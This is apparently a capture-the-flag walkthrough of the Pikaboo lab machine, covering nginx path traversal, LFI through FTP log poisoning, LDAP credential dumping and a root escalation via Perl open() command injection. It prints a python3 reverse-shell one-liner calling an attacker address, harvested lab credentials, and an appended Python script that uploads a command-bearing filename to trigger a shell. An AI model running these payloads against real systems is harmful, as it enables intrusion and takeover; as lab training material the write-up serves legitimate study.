As always, we start with nmap to discover open ports/services.
Nmap Scan
nmap -sC -sV -oA pikaboo 10.10.10.249
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-26 16:58 EET
Nmap scan report for 10.10.10.249
Host is up (0.12s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 17:e1:13:fe:66:6d:26:b6:90:68:d0:30:54:2e:e2:9f (RSA)
| 256 92:86:54:f7:cc:5a:1a:15:fe:c6:09:cc:e5:7c:0d:c3 (ECDSA)
|_ 256 f4:cd:6f:3b:19:9c:cf:33:c6:6d:a5:13:6a:61:01:42 (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Pikaboo
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We have three open ports:
21 => FTP
22 => SSH
80 => HTTP
There are no known critical vulnerabilities for these versions. I checked FTP for anonymous login, but it is not allowed, so let's start enumerating port 80.
HTTP Enumeration
Going to http://10.10.10.249 we see Pokatdex, Contact and Admin pages. Pokatdex and Contact don't contain anything useful, and Admin requires credentials to log in.
I tried default credentials like admin:admin, which didn't work, but after clicking Cancel on the authentication prompt I noticed something interesting.
The error page says it was served by Apache/2.4.38 on port 81, while nmap reported nginx on port 80. So nginx is most likely acting as a reverse proxy, forwarding requests for /admin to an Apache instance listening on port 81.
I know from a previous machine that a misconfigured nginx location (a location without a trailing slash paired with an alias or proxy_pass target that has one, the "off-by-slash" mistake) allows path traversal one level up into the target. It is a configuration error rather than a bug in nginx itself, and this post describes it:
https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/
Trying what the post describes (requesting /admin../ instead of /admin/) returns Forbidden rather than the authentication prompt, so the traversed path is being handled differently and is worth digging into.
Now let's run ffuf and fuzz for hidden directories under the traversed path.
ffuf -u http://10.10.10.249/admin../FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -t 100 -e php | tee -a nginx-lfi.ffuf
It found a javascript directory, which gives Forbidden, and a server-status page (Apache's mod_status, which lists recent requests with their full URLs), so let's check that.
There is an admin_staging directory; let's check it.
Note that you have to put a trailing "/" after admin_staging, otherwise Apache's directory redirect, built with the backend's own hostname, sends you to localhost.
While enumerating the dashboard I found nothing helpful, but there is a page parameter that looked like a candidate for LFI.
I tried including /etc/passwd, which didn't work, and also tried the php://filter wrapper to read the source of every PHP file, but found nothing useful.
After wasting a lot of time I remembered something: FTP is open, and server-status showed a request to /admin/../admin_staging/index.php?page=/var/log/vsftpd.log, so let's try to read that file.
We are able to read it, so we do have LFI; the earlier failures just mean the include is restricted to certain paths, and the vsftpd log is one of the allowed ones.
Since vsftpd writes the username of every login attempt into that log, we can try FTP log poisoning: send PHP code as the FTP username so it lands in the log, then include the log through the LFI to execute it on the system.
Initial Foothold
First we connect to FTP and attempt a login whose username is a small PHP payload that runs the id command. The login fails, and vsftpd records the failed attempt, username included, in /var/log/vsftpd.log.
Then we use the LFI to include the FTP log file, and the PHP inside it is executed.
Now that we can execute commands on the system, let's get a reverse shell. Start a netcat listener, then poison the log again with the id command replaced by a reverse shell (every poisoned line executes on each include, so the earlier payload will run again as well).
Read the FTP log through the LFI once more to execute the PHP code, and we get a shell.
Getting root
While enumerating, I found an htpasswd file inside /etc/apache2/ that contains a password hash. I tried cracking it but failed.
admin:$apr1$0.2FVvEK$Xn42uf/ySS5IPTKXfebXM.
Inside /opt there is pokeapi, the API that wasn't finished on the site, so let's look for hardcoded credentials.
I found LDAP bind credentials inside /config/settings.py:
binduser:J~42%W?PFHl]g
The same /config/settings.py also contains another set of credentials:
ash:pokemon
LDAP is also listening on localhost, so let's bind with the binduser credentials and dump everything from the directory.
ldapsearch -x -h 127.0.0.1 -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w 'J~42%W?PFHl]g' -b "DC=pikaboo,DC=htb"
Among the results is the userPassword attribute of the pwnmeow user. ldapsearch prints attribute values that are not plain printable text base64-encoded (marked with a double colon), and decoding it gives:
pwnmeow: G0tT4_C4tcH’3m_4lL!_
I tried the password with SSH and su and it didn't work, but it worked for FTP.
Logged in over FTP we can't list any of the directories there, and there is nothing else to do, so I returned to the shell and continued enumeration.
I found a cron job that runs /usr/local/bin/csvupdate_cron; let's check it.
It passes the name of each directory in /srv/ftp to another script, so let's take a look at that one.
This Perl script just updates the existing CSV files with the ones uploaded over FTP. But Perl's open function is vulnerable to command injection when it is called in the two-argument form with an attacker-controlled filename; this link explains the problem.
https://stackoverflow.com/questions/26614348/perl-open-injection-prevention
If the filename starts with a | character, two-argument open treats the rest of the name as a shell command and runs it instead of opening a file (a trailing | does the same, reading from the command's output).
So we need to upload a file into one of the directories under the FTP root whose name is a | followed by a reverse shell; when the cron job runs the script, open() executes our command and gives us a shell.
First, create a file on your machine named test and start a netcat listener, then connect to FTP as pwnmeow and run the following (the backslashes and doubled quotes are there for the ftp client's own argument parser, which would otherwise split the name on spaces and quotes; the server receives the plain filename):
cd versions
put test "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("\"10.10.16.32\",1337));[os.dup2(s.fileno(),f)for\ f\ in(0,1,2)];pty.spawn(""\"sh\")';.csv"
Wait for a moment, and we are root!
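The same upload done with ftplib, which sends the filename verbatim in the STOR command and so avoids the ftp client's escaping. This is an added example for this page, not the writeup's own code. It assumes what the writeup implies but does not show: that the Perl script opens each uploaded *.csv with two-argument open(), that pwnmeow's FTP home is the /srv/ftp tree the cron job walks, and that versions is one of its subdirectories. The check for "/" is my own: the command is a filename, so a slash would be taken as a path separator, which is why a python3 one-liner is used instead of a bash /dev/tcp shell.

```python
"""Upload a file whose *name* is a shell command, for the csvupdate cron job.

Added example, not the writeup's own code.  Assumptions (not shown on the
page): the Perl script uses two-argument open() on each uploaded *.csv, so a
name beginning with '|' becomes a pipe to a command; pwnmeow's FTP home is
the /srv/ftp tree the cron job walks, and 'versions' is a directory in it.
"""
import ftplib
import io
import sys

TARGET = "10.10.10.249"
FTP_USER, FTP_PASS = "pwnmeow", "G0tT4_C4tcH'3m_4lL!_"


def python_reverse_shell(lhost: str, lport: int) -> str:
    """The python3 one-liner from the writeup, free of ftp-client escaping.

    It contains no '/' so it can be used as a filename.
    """
    return (
        "python3 -c 'import os,pty,socket;s=socket.socket();"
        f"s.connect((\"{lhost}\",{lport}));"
        "[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn(\"sh\")'"
    )


def injection_filename(command: str) -> str:
    """Build the malicious filename.

    A leading '|' makes two-argument open() run the rest as a shell command.
    The ';.csv' suffix keeps the name matching a *.csv filter (assumed from
    the writeup's filename) while the ';' terminates the command so '.csv'
    is not passed to it as an argument.
    """
    if "/" in command or "\n" in command or "\r" in command:
        raise ValueError("command must not contain '/' or newlines: it is a filename")
    return f"|{command};.csv"


def upload(host: str, directory: str, filename: str, data: bytes = b"x\n") -> str:
    """Store a throwaway file under the crafted name; returns the server reply."""
    ftp = ftplib.FTP()
    ftp.connect(host, 21, timeout=10)
    try:
        ftp.login(FTP_USER, FTP_PASS)
        ftp.cwd(directory)
        # STOR takes the remainder of the line as the name, spaces and all,
        # so no shell- or client-level quoting is needed here.
        return ftp.storbinary(f"STOR {filename}", io.BytesIO(data))
    finally:
        ftp.close()


if __name__ == "__main__":
    lhost = sys.argv[1] if len(sys.argv) > 1 else "10.10.16.32"
    # Start `nc -lvnp 1337` first, then wait for the cron job to fire.
    name = injection_filename(python_reverse_shell(lhost, 1337))
    print(upload(TARGET, "versions", name))
```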